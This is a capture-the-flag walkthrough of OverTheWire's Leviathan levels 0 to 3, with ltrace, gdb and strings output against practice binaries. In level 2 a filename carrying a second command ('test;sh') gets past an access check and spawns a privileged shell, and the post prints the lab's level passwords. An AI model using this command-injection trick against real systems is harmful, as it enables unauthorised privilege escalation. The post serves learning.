OTW – Leviathan

These are security problems from OverTheWire. Leviathan is a collection of challenges that require common sense and basic unix commands.

Leviathan Level 2 → Level 3

The printfile will print a file content on screen. However, trying to show the leviathan3 password result in permission issue.

./printfile /etc/leviathan_pass/leviathan3
You cant have that file...

Let do a ltrace again with the password and see what happened.

ltrace ./printfile /etc/leviathan_pass/leviathan3
__libc_start_main(0x80484f4, 2, -10332, 0x80485d0, 0x8048640 <unfinished ...>
access("/etc/leviathan_pass/leviathan3", 4) = -1
puts("You cant have that file..."You cant have that file...
) = 27
+++ exited (status 1) +++

Let see what happen if we use printfile correctly.

ltrace ./printfile /tmp/l2/test
__libc_start_main(0x80484f4, 2, -10316, 0x80485d0, 0x8048640 <unfinished ...>
access("/tmp/l2/test", 4) = 0
snprintf("/bin/cat /tmp/l2/test", 511, "/bin/cat %s", "/tmp/l2/test") = 21
system("/bin/cat /tmp/l2/test"
 <unfinished ...>
--- SIGCHLD (Child exited) ---
<... system resumed> ) = 0
+++ exited (status 0) +++

Notice it will check the access level and then print the file using /bin/cat on the filename. The problem with this is that there is no input sanitizing and we can attach a filename that do additional commands.  First thing comes to mind is to append a command to read the password file but “/” is not allow in a file name. So we could use “;” to add a second command that spawn a shell.

touch "/tmp/l2/test;sh"
./prinfile "/tmp/l2/test;sh"

We simply read the content of the password file for the next level after we spawn a shell using elevated permission.

whoami
leviathan3

cat /etc/leviathan_pass/leviathan3
Ahdiemoo1j

Leviathan Level 1 → Level 2

From here on out, there are no information on this level. In the home directory, there is an executable file check, so let’s try it. A prompt for password displayed. I type password and reply by Wrong password.

./check
password: password
Wrong password, Good Bye ...

Let’s use gdb. When disassemble main, we got the following:

Dump of assembler code for function main:
 0x080484f4 <+0>: push %ebp
 0x080484f5 <+1>: mov %esp,%ebp
 0x080484f7 <+3>: and $0xfffffff0,%esp
 0x080484fa <+6>: sub $0x30,%esp
 0x080484fd <+9>: mov %gs:0x14,%eax
 0x08048503 <+15>: mov %eax,0x2c(%esp)
 0x08048507 <+19>: xor %eax,%eax
 0x08048509 <+21>: movl $0x786573,0x24(%esp)
 0x08048511 <+29>: movl $0x72636573,0x14(%esp)
 0x08048519 <+37>: movw $0x7465,0x18(%esp)
 0x08048520 <+44>: movb $0x0,0x1a(%esp)
 0x08048525 <+49>: movl $0x646f67,0x28(%esp)
 0x0804852d <+57>: movl $0x65766f6c,0x1b(%esp)
 0x08048535 <+65>: movb $0x0,0x1f(%esp)
 0x0804853a <+70>: mov $0x8048690,%eax
 0x0804853f <+75>: mov %eax,(%esp)
 0x08048542 <+78>: call 0x80483d0 <printf@plt>
 0x08048547 <+83>: call 0x80483e0 <getchar@plt>
 0x0804854c <+88>: mov %al,0x20(%esp)
 0x08048550 <+92>: call 0x80483e0 <getchar@plt>
 0x08048555 <+97>: mov %al,0x21(%esp)
 0x08048559 <+101>: call 0x80483e0 <getchar@plt>
 0x0804855e <+106>: mov %al,0x22(%esp)
 0x08048562 <+110>: movb $0x0,0x23(%esp)
 0x08048567 <+115>: lea 0x24(%esp),%eax
 0x0804856b <+119>: mov %eax,0x4(%esp)
 0x0804856f <+123>: lea 0x20(%esp),%eax
 0x08048573 <+127>: mov %eax,(%esp)
 0x08048576 <+130>: call 0x80483c0 <strcmp@plt>
 0x0804857b <+135>: test %eax,%eax
 0x0804857d <+137>: jne 0x804858d <main+153>
 0x0804857f <+139>: movl $0x804869b,(%esp)
 0x08048586 <+146>: call 0x8048410 <system@plt>
 0x0804858b <+151>: jmp 0x8048599 <main+165>
 0x0804858d <+153>: movl $0x80486a3,(%esp)
 0x08048594 <+160>: call 0x8048400 <puts@plt>
 0x08048599 <+165>: mov $0x0,%eax
 0x0804859e <+170>: mov 0x2c(%esp),%edx
 0x080485a2 <+174>: xor %gs:0x14,%edx
 0x080485a9 <+181>: je 0x80485b0 <main+188>
 0x080485ab <+183>: call 0x80483f0 <__stack_chk_fail@plt>
 0x080485b0 <+188>: leave 
 0x080485b1 <+189>: ret

We can see a few functions such as 3 getchar and strcmp. We test the 3 getchar by pressing enter three times after running the program. The program immediately terminate with wrong password. Using strings on the file will list all the readable string. We can look for a three characters word that is our string.

strings check
/lib/ld-linux.so.2
xRQ|
__gmon_start__
libc.so.6
_IO_stdin_used
puts
__stack_chk_fail
printf
getchar
system
strcmp
__libc_start_main
GLIBC_2.4
GLIBC_2.0
PTRh0
D$,1
D$$sex
secrf
D$(god
love
T$,e3
UWVS
[^_]
password: 
/bin/sh
Wrong password, Good Bye ...
;*2$"

There are few choice, after trying them, the word sex work. I later find out that ltrace gave a even better solution. The library function stcmp is comparing “sex”. When execute the file with the password “sex”, the program spawn a shell.

ltrace ./check
__libc_start_main(0x80484f4, 1, -10268, 0x80485c0, 0x8048630 <unfinished ...>
printf("password: ") = 10
getchar(0x8048690, 32768, 0x8049ff4, 0x80485e1, -1password: sex
) = 115
getchar(0x8048690, 32768, 0x8049ff4, 0x80485e1, -1) = 101
getchar(0x8048690, 32768, 0x8049ff4, 0x80485e1, -1) = 120
strcmp("sex", "sex") = 0
system("/bin/sh"$

While in an elevated permission shell, checking whoami will show that we are now levianthan2! Simply look for the next password in /etc/leviathan_pass/leviathan2 (similar to bandit).

whoami
leviathan2

find / -user leviathan2 2</dev/null
/etc/leviathan_pass/leviathan2
/home/leviathan1/check

cat /etc/leviathan_pass/leviathan2
ougahZi8Ta

Leviathan Level 0 → Level 1

Summary:
Difficulty:     1/10
Levels:         8
Platform:   Linux/x86

Author:
Anders Tonfeldt

Special Thanks:
We would like to thank AstroMonk for coming up with a replacement idea for the last level,
deadfood for finding a leveljump and Coi for finding a non-planned vulnerability.

Description:
This wargame doesn't require any knowledge about programming - just a bit of common
sense and some knowledge about basic *nix commands. We had no idea that it'd be this
hard to make an interesting wargame that wouldn't require programming abilities from 
the players. Hopefully we made an interesting challenge for the new ones.

From the home directory, there isn’t much except a hidden backup folder and a bookmark.html file in it.

ls -al
total 24
drwxr-xr-x 3 root root 4096 Jun 6 2013 .
drwxr-xr-x 160 root root 4096 Jul 28 17:05 ..
drwxr-x--- 2 root leviathan0 4096 Jun 6 2013 .backup
-rw-r--r-- 1 root root 220 Apr 3 2012 .bash_logout
-rw-r--r-- 1 root root 3486 Apr 3 2012 .bashrc
-rw-r--r-- 1 root root 675 Apr 3 2012 .profile

cd .backup ; ls -al
total 144
drwxr-x--- 2 root leviathan0 4096 Jun 6 2013 .
drwxr-xr-x 3 root root 4096 Jun 6 2013 ..
-rw-r----- 1 root leviathan0 133259 Jun 6 2013 bookmarks.html

If you look into the file, then you will find a legit html file with a lot of information. Since I am just freshly completed bandit, I wonder if I am looking for the password for leviathan1 in this file. There it is, the password for the next level is right next to the username for the next level.

grep "leviathan1" bookmarks.html
<DT><A HREF="http://leviathan.labs.overthewire.org/passwordus.html | 
This will be fixed later, the password for leviathan1 is rioGegei8m" 
ADD_DATE="1155384634" LAST_CHARSET="ISO-8859-1" ID="rdf:#$2wIU71">
password to leviathan1</A>

That was surprisingly easy.